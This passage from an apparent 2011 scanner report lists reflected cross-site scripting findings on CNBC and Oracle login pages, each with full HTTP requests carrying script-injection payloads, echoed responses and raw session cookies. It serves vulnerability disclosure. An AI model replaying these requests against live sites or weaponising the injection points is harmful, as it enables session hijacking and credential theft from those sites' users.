<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<iframe name="regFrame" frameborder="0" class="registerFrame" style='height:800px;' scrolling="no" src='https://register.cnbc.com/registerUser.do?iframe=yes&source=register&55fd4'><script>alert(1)</script>bb9117bee86=1'>
...[SNIP]...

3.46. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67364"><script>alert(1)</script>6e7c0304749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&67364"><script>alert(1)</script>6e7c0304749=1 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:35 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&67364"><script>alert(1)</script>6e7c0304749=1">
...[SNIP]...

3.47. https://login.cnbc.com/cas/login [service parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The value of the service request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beaf8"><script>alert(1)</script>27bcb15f035 was submitted in the service parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_checkbeaf8"><script>alert(1)</script>27bcb15f035&login_view=register HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:09 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_checkbeaf8"><script>alert(1)</script>27bcb15f035&login_view=register">
...[SNIP]...

3.48. https://login.cnbc.com/cas/login [source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34868"><script>alert(1)</script>3f8471aa8dc was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header34868"><script>alert(1)</script>3f8471aa8dc&login_view=header HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; TZM=-300; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:32 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 5727
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header34868"><script>alert(1)</script>3f8471aa8dc&login_view=header">
...[SNIP]...

3.49. https://login.cnbc.com/cas/login [source_type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The value of the source_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb331"><script>alert(1)</script>a8ddc251ca7 was submitted in the source_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=procb331"><script>alert(1)</script>a8ddc251ca7&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 7137
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=procb331"><script>alert(1)</script>a8ddc251ca7&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription">
...[SNIP]...

3.50. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/oam/server/sso/auth_cred_submit

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload c1951<script>alert(1)</script>81611ea9517 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=-11174233175931698103c7b4%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ed6751adef14af5029c1951<script>alert(1)</script>81611ea9517 HTTP/1.1
Host: login.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315342940933; gpv_p24=no%20value; gpw_e24=no%20value; OAM_REQ=VERSION_4~NxywdvpcawCyMkTM4G71qJsOq72hZVWrUNC3MjhZV9f3dtJf5aL3%2flDPZgqxy71LbJwEeSlEW%2bymPmYi5xnQd1VhYNUy5BAaQuWYV1QPtKgkHgViQXuu26%2fj9P%2bw7wamSRLoSY38UWPAZZDVHEosIjfK91K4L24lW4XlijkOrHkWMnkThMoCKL%2bm%2fkypFHNQZbPrecqEbxIQ%2fmL1U5EjmghHZqmMKsGwfiolkoWQOZxYTitVababmv1AA2pygpRMHDHB3W0UuNa9IPK%2bWkEj7AzlwgJ%2fsOwSy6GgL4C6l6NBQqxbGALlu6wLGhs5CKMzrVnQuA9NYhkBoYNMq%2bCeiIvgzIykEQVBwnmmKyvVvDqW8dGr%2fTLu5ygIeagS0vuoz7CbOcyEcz27f8vx5%2fqclvJSD7mbtCvuMPbprZKgdGRSci3Z0qQF4Jkyj7YVT2LV008x7AIUy3QkD0rVEoH2xVeMEOUn7VAou3g28%2b%2bOUB3OZroMTKz273KYFOQk3bQBOTUoFLCR%2bQyOlwxMhhIJ46nIPIAn%2fcQ5NZtupalbBJ7rQNdrYpyvQGz%2bdftIr%2ff31bi1Diah8geTQiyN4%2fZ3KcMqlP9TnOuY5hEGmm4wObcg5WglrQVYV7isRF6AWRkd%2bk1kEROGepai8RjtcAegR%2b5Z%2bvUec4r7a%2b75gZc48dgS%2faR8ruh9CTlAwpKcFob2kF%2bHchzeWKHKjkNcAWhSbGFjrK4swdSEankx6biqm5UVJCpSmc%2fAq%2f1fgZR9sjRHHVSxrgB8EnObY98hf1BCukBz8mQps1PektbRn%2fALeHk%2fS9pVnjKwJFaXsNxsZt7TeEYc%2b71Dnk%2fz8YCzpWeR%2f%2bPl8unuOYUH1q44XoUMeLi1%2bADiVqRneB63%2ftWzOWBp50u1N%2bTy1Kxey3dC%2fdoECGY5XNp5zCsHkUZul5sxXdCUW8lNpPzmarHhun73cOKwJBV7ogKTADKqN7ertSGyqCCjzSMI40kgozmLHU2oD9JDPg28mWXowW1qliMYnh%2ffjkD6OqiHp3Y%2fzNYwnBP7Zh%2buj2%2fyGD%2fPaFWIi6cQrOgRdNlcb0Xc%2fl97NrLc8abdD%2f2un8kDJBUiE8023fM0yFwVHx6uFPqFC%2b%2fngCymDqp1UfTNFD5jCD6p7puTqmmLhUDn6xfgKkZhyCMLrpj26EuwcS7RSm7%2fS%2bkrjH5E3lHwAy7ss%2f4F2fNwASHfwHnFJSGkvYhLj3AL5tPNeNBKhhv%2bn4YDvdI65VI%2f985I9wzT5mDJ1xu6Z4lWDWiA5b8LGOn1dLaUvEN64D5Z53%2bY53LwfiQwVsaYFhOkJuG8Xp1nQWOuaPahq6jJTJgjFzJwBnE%2fGjHnoymO2FRpu48mOQooisWYBNUBz8Z8XWYk59Pmpr2QbX2lyJwghsEhfdMEBFfE4FIJ0sX93gHzRH9UUOwvWTsKqVZu82K6yOUAOUr7etnP4vYyxqUss0NXMcoXF7HQftpSaRbwpUtZ1B8F3feEjs9tBu45afXQ%2f%2fSOWltFnIIGzJzbE%2fvCkj9em8VBWnmiD%2bV3rKjz97EImPLbVavhHui4v98zrLQqvLqqytf%2fVCeOVu1MWD3zkUoC%2boXnBk%2bQw92SwOYQPwwouiBG%2b28Wl1QaypOncFf99oGzCgdaVMoKy7I1ClMk7jlTETTOWm09pk1afrjvV4tOZQ%2bz59ytqFim1FRiwWoC6yqRWJo%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:18:57 GMT
Set-Cookie: OAM_REQ=VERSION_4~EsY9351n%2bL75TyUMNl8LPW73mzYZPslZUdvAtbyf8I%2fsrrJG5gzSLEfs2wZO0aEEm%2f3JWzNmG5jKe1aJAnCDP45JBWjpLTnQMtc34bOV7V2iNl%2bMrXJxYSb8XBcWr%2foOxZLH36duZJi1Fm4481Kymq8RinvKKwEhGJLJOFo2%2fB0wEjM60VcUlsN%2fKUtXh4CgEjVg7oZzDAHzJEz0lBT0G0mYFIZUWbAwWFsi8vdddXkh3cGZotSc7eeh%2boqhYbRAAiGh1v7c4RTA%2fxqbZqQ9pHeY3qYge8IjHXdqcNQnfDNGI0eFb4QBv1JTF2%2fKIjJfwvgdn6nr1SICR86ih13Yu1t2KpaAAYmeonATsz0XlE%2bU6kXqcKnt0dInUlPhrsLbWee5NP9%2f19mt6gV9zPvaM7hDwtQuWCcNU4htv8gXHjTQBxsA%2b2SvZtvr0kIZkXlmkGg%2fb%2foAVB9D0pFXD6Ggh9cdooUvzY4viPGsxAfoI%2f591d7glZBOLkgUvS48uK6RRu8NbzYWHtpXaa%2bYmBTshVsE13YQpK4ObNWjS72Y5vFAmdYi7HisthZdJD%2bHKoa%2bOdwh7tD%2fYIf3aJj78SR9ufKcbtbzLYE6SRCixeTUyhCUnGsbtdI31KyQLmKtrx2kgJDwqmaIim5jLj099PmJF0gU0RYjYzuUbYwR45faQYsxxEoQ7mnGRwfyy5s4fmWlSX9cHmRyX8MW2EPSMraeHUpS33ko2QOwyIrkrEHFOjXrYfd%2b2yVFLS9IXJUiBwGSoRAF1LeDE2dHSjlLkLsSWTwm7oTRF98APeVSfu2R1J4uop1cWyJRFoJExHTDPjtafiU719gvppS0djK92osAheYsmsO4A9K3cLOBuVRPQJluOSLGsSFMpr%2fbqQYp6y8T0dAMi3Ds%2f9%2foCumvkBAgtzYNYsKhiKGbLTi0rzOD4e0jK0hoVDZrNvRpgKBl%2fvq0kUxndQ5un4EUFmbJp%2fE%2b%2bnjaGwCuXkMTK%2buWsVLQyiaxJS4EiCg42C4vv1PHJL1C9jHFtkkgU1fdTb6Yx6Wj2uU%2fByUOD94IPUfC%2bNe0cX%2fHcutt3ZxhT%2bkDMxUxcjIDBZv%2bjbISVrlcqGQ4ntNi2PSo9U2Gqrt1AeNkQ3K%2bzddfzhCG1M6bw8RoPiwzmjq6cLwQnbDKRHZqcJjGfW6FmionsHL4QaXJXEnlW88m9xVGQSZ8pIn1nBQJU26i68WyubXHx7jGY2yvR2Ru5kgn8PI0iaAsSWrmDsmvWI5v6Kf4i7P5Nm8CFY9TxPTz849yBwTijE5fAsm7L4F8CLSmt89c98WJd6N%2bEFyMapg9wfYYko62Zd7HhEbEhmauhmH7HnDCWwkjxJy%2fKRi2RxzUptRMTQ%2bgSnCV5RACLDybfDacI5duyXUFjDqxPyka7YQMifwTXMqc3I7yEM18nPI3Y3g6Pn4vS9bIKfmfbkDjkPf1Lu%2fz%2bNBXWNYccZhpG%2bndCyVP9CMRwLXGXxi85ZQvMKNEb8UzlaokmVmoMOXLkDYZyao7nbTJz7HzACTg%2bJOPN6ODWcwIr%2bbaGqTdMQQqLBa1KUkkVHx33BbHmyWSx6md0HukHmNASFcrFOuUkzd1RgurnTT7F%2bWo7huPmYTZ5pkYL%2fxHh5nXWaUsT%2f%2bHJ3LgdFdRvSgHzSSKQXl2K5HA%2bafmHtpxAgjYIr%2f12UctTk8YSf1XNIlrJjw3oLycqG3pChKZPr1DE%2bJjgVSTtL8VOC5tisuN5sEc%2fl3lM1yEGpm4LlDAWVY0D4v03%2brC9QMFtOF2qj%2bg0QZ2QxGggBLrs9B%2bf5L2cszHFtNSmEPvb0x6UIkFqgSfaz3bAKqM6VzRhBOrRC9lTl6C1unvfpSlrjT5Atd7Wplo72DP7htU9fVHm50C9vn8vTujqBCpXdmpzbEbwHbDMvwGy5GJOgva64ea0ayQeOm1Rr1jzwXX9BMO8dpefvXa5fo6IpgF%2bDE5jAf5JfBDwNyAFF51SwB5L6xBQndB1cLNqYJqdOBQUg%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zYGTK6uHK6EVADUS1EHWFB01tbde
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:18:57 GMT; path=/
Content-Length: 2709

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...
</script>d6751adef14af5029c1951<script>alert(1)</script>81611ea9517">
...[SNIP]...

3.51. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/oam/server/sso/auth_cred_submit

Issue detail

The value of the request_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c7b4"><script>alert(1)</script>d6751adef14af5029 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%252bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%252flJzu7m9%252f1lXhQDZkvLYt%252bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%252fwXpbFtlj2kGJ%252fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%252f%252fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%252fDEO%252fCYluZce8U%252bGGbT0K9o1sJA4XjxLL8%252f8AfNO%252fwgLKh%252bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%252f1ao%252btvjJSu1MtNbwWjD8UmI6Bp%252bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%252fcJMIXtw%252fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%252b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%252bbfWK8%252f54EneCznHCw32Dn13%252f%252b2dACr4TQeKM9Oua%252f%252bwnu%252bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%252bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%252fPItNWUsY%252bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%252fk2aJmyp8Ow%252fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%252bEXUOC%252f6G2f3htenFJenmnMekNtGu%252fXfaFZL8GjhhVe5W2JhMe%252bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%252fvB%252bACTy9lrXfSV77QwN%252buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%252bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%252fD4y50BLNBJCH%252b8a6B8NLIOqiOoU%252fCEYSRHDnFZv5HTMnTiqJZ%252bljcmdaGu3BPZkHEknjwJ%252frdJN%252fF4KZDIxyB3z0Gc63SxU5%252bTOVa2gKg9LLQNB2%252bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%252fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%252f010hrRBg%252bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%252f5w%253d%253d&site2pstoretoken=v1.2%7E15AB5291%7ECA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682&locale=&ssousername=xss&password=xss HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNtGu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:17:10 GMT
